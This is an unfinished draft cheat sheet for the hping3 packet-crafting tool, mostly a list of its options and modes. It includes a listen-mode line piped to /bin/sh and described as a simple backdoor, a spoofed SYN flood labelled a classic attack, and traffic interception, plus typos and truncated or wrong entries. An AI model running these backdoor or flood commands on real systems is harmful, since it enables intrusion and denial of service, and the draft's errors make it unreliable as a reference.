Show Menu

Hping3 Cheat Sheet (DRAFT) by

is a network tool able to send custom ICMP/UDP/TCP packets and to display target replies like ping does with ICMP replies. It handles fragmentation and arbitrary packet body and size, and can be used to transfer files under supported protocols.

This is a draft cheat sheet. It is a work in progress and is not finished yet.


hping3 -h --help
show this help
hping3 -v --version
show version
hping3 -c --count
packet count
hping3 -i --interval
wait (uX for X micros­econds, for example -i u1000)
hping3 --fast
alias for -i u1000 (10 packets for second)
hping3 --faster
alias for -i u1000 (100 packets for second)
hping3 --flood
sent packets as fast as possible. Dont show replies.
hping3 -n --numeric
numeric output
hping3 -q --quiet
hping3 -I --inte­rface
interface name (otherwise default routing interface)
hping3 -V --verbose
verbose mode
hping 3 -D --debug
debugging info
hping3 -z --bind
bind ctrl+z to ttl (default to dst port)
hping3 -Z --unbind
unbind ctrl+z
hping3 --beep
beep for every matching packet received

For ICMP use:

hping3 -C --icmptype
icmp type (default echo request)
hping3 -K --icmpcode
icmp code (default 0)
hping3 --forc­e-icmp
send all icmp types (default send only supported types)
hping3 --icmp-gw
set gateway address from ICP redirect (default
hping3 --icmp-ts
Alias for --icmp --icmptype 13 (ICMP timestamp)
hping3 --icmp­-addr
Alias for --icmp --icmptype 17 (ICMP address subnet mask)
hping3 --icmp­-help
display help for others icmp options

ARS packet descri­ption (new, unstable)

Send the packet described with APD (see docs/A­PD.txt)


hping3 -2 [] -P ++44444 -T -n
basis UPD traceroute fuzzing, if stuck press CTRL+Z to skip unresp­onsive hop.

Mode use: Default Mode TCP

hping3 -0 --rawip
RAW IP mode
hping3 -1 --icmp
ICMP mode
hping3 -2 --udp
UDP mode
hping3 -8 --scan
SCAN mode (Example: hping --scan 1-30,70-90 -S www.ta­rge­
hping3 -9 --listen
listen mode

UDP/TCP parame­ters:

-s --base­report
base source port (default random)
-p --destport
[+][+]­<po­rt> destin­ation port (default 0) ctrl+z inc/dec
-k --keep
keep still source port
-w --win
winsiz (deafult 64)
-O --tcpoff
set fake tcp data offset (insted of tcphdrlen /4)
-Q --seqnum
shows only tcp sequence number
-b --badcksum
(try to) send packets with a bad IP checksum, many systems will fix the IP checksum sending the packet so you'll get bad UDP/TCP checksum instead.
-M --setseq
set TCP sequence number
-L --setack
set TCP ack
-F --fin
set FIN flag
-S --syn
set SYN flag
-R --rst
set RST flag
-P --push
set PUSH flag
-A --ack
set ACK flag
-U --urg
set URG flag
-X --xmas
set X unused flag (0x40)
-Y --ymas
set Y unused flag (0x80)
use last tcp->t­h_flags as exit code
enable the TCP MSS option with the given value.
enable the TCP timestamp option to guess the HZ/uptime.


hping3 -9 HTTP -I eth0
listening mode, intercept traffic going through our machine's network interface


hpin3 -I eth1 -9 secret | /bin/sh
pipe receiving packets to /bin/sh in order to create a simple backdoor

For IP use:

-a --spoof
spoof source address
random destin­ation address mode.
random source address mode.
-t --ttl
ttl (defau­lt64)
-N --id
id (default random)
-W --winid
use win* id byte ordering
-r --rel
relativize id field (to estimate host traffic)
-f --frag
split packets in more frag. (may pass weak acl)
-x --morefrag
set more fragment flag
-y --dontfrag
set don't fragment flag
-g --fragoff
set the fragment offset
-m --mtu
set virtual mtu, implies --frag if packet size > mtu
-o --tos
type of service (default 0x00), try --tos help
-G --rroute
includes RECORD­_ROUTE option and display the route buffer
loose source routing and record route
strict source routing and record route
-H --ipproto
set the IP protocol field, only in RAW IP mode


-d --data
data size
-E --file
dta fromfile
-e --sign
add 'signa­ture'
-j --dump
dump packets in hex
-J --print
dump printable characters
-B --safe
enable 'safe' protocol
-u --end
tell you when --file reached EOF and prevent rewind
-T --trac­eroute
traceroute mode (implies --bind and --ttl 1)
Exit when receive the first not ICMP in traceroute mode
Keep the source TTL fixed, useful to monitor just one hop
Don't calcul­ate­/show RTT inform­ation in traceroute mode

File Transfer:

hping3 -1 [IP Addr] -9 signature -I eth0
transfer complete receiving files


hping3 -S [Target IP Addr] -a [IP Addr] -p 22 --flood
classic attack flooding